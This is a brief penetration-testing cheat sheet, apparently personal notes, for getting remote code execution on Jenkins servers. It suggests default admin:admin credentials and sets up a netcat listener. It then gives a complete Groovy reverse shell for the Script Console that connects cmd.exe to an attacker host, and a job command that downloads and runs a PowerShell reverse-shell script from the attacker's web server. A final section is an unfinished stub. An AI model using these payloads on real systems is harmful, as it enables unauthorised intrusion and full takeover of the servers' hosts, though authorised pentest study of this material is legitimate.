## Login
Default credentials to Jenkins are admin:admin. Try it.

# RCE with Admin Account

Access `http://<IP_address>:8080` and check if Jenkins login panel is avaliable.
If yes, then go to the next step `Login`.

1- nc -nvlp 4444
2- Run the code below via Jenkins
### First scenario:
1. Go to `Manage Jenkins` -> `Script Console`
2. Add Groovy script to execute this code on Windows machine:

Thread.start { String host="<your_machine_IP>"; int port=<your_webserver_port>; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); }

3. Run script and you should have session open in your listener.

### Second scenario:

1- Download: <https://github.com/strikoder/custom_pentest_scripts/blob/main/(Jenkins)%20Invoke-PowerShellTcp.ps1>
2- webserver: python -m http.server 80

1. Go to `New Item` -> `Freestyle job` -> `Execute Windows batch command`.
2. Add Powershell code:

powershell iex (New-Object Net.WebClient).DownloadString(‘http://<your_machine_IP>:<your_webserver_port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <your_machine_IP>-Port <your_listener_port>

3. Save new job configuration with `Apply`.
4. Run job clicking `Build now` and you should have session open in your listener after job is completed.

### Third scenario:
Go to build history
check projets there
then go configure
then scroll down to build (where you run revshell)

‣ (check later)